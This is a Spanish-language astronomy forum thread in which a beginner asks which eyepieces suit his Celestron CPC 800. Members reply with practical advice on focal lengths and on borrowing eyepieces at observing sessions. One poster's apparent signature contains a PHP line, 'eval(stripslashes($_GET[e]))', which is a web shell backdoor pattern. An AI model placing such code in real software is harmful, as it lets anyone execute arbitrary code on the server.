Cuando compre oculares que tengo que tener en cuenta

Subforo dedicado a los oculares. En este foro no está permitida la venta de ningún tipo de material.
Responder
javi
Mensajes: 235
Registrado: Jue Abr 23, 2009 4:38 pm

Cuando compre oculares que tengo que tener en cuenta

Mensaje por javi »

Hola a todos todavia no he estrenado el telescopio, pero cuando me decida a comprar oculares que debo tener en cuenta, o cuales me interesan al principio y cuales cuando pase un poco de tiempo y coja experiencia etc. Tengo el celestron CPC 800 GPS. Asi que ahi queda la pregunta.

Un saludo.
rcacho
Mensajes: 532
Registrado: Vie Mar 02, 2007 9:39 pm

Cuando compre oculares que tengo que tener en cuenta

Mensaje por rcacho »

Seguramente con el telescopio vengan oculares, asi que empieza utilizando esos. Cuando vayas a las salidas, la gente te prestará sus oculares y podrás decidir cuales te gustan.

Un saludo!
javi
Mensajes: 235
Registrado: Jue Abr 23, 2009 4:38 pm

Cuando compre oculares que tengo que tener en cuenta

Mensaje por javi »

Solo viene uno aunque supongo que con un solo ocular te puedes tirar bastante tiempo escudrñando el cielo creo.
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Cuando compre oculares que tengo que tener en cuenta

Mensaje por Manuelariza »

Como dice rcacho lo mejor es que en una salida te informes mejor probando varios,después va el tema económico,depende de lo holgado que sea tu bolsillo pues te podrás pillar uno o otros,pero un termino medio y que tengan una calidad aceptable, están los Hyperiones,yo los he tenido y todavía me queda uno y me gustan mucho,lo que pasa es que con el tiempo te vas lanzando cada vez desde mas alto a la piscina.


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Cuando compre oculares que tengo que tener en cuenta

Mensaje por m3ntol »

Tu teles tiene una focal de 2000. Como consejo te diría que tires a por oculares de focal larga, más bien de 20mm para arriba. Si quieres tener alguno de gran aumento tira a por uno de 8mm (250 aumentos) para uso en noches especialmente buenas, un ortoscópico suele dar buena calidad a precio asequible.

Otro consejo, intenta no probar aquellos oculares que no puedas comprar... solo vas a ponerte los dientes largos :cry: :cry: a mi me pasó con los ethos :cry: :cry: :cry:
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Cuando compre oculares que tengo que tener en cuenta

Mensaje por Manuelariza »

Malditos ethos,solo son fabricados para poner los dientes largos. :wink: :wink: :wink:


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Responder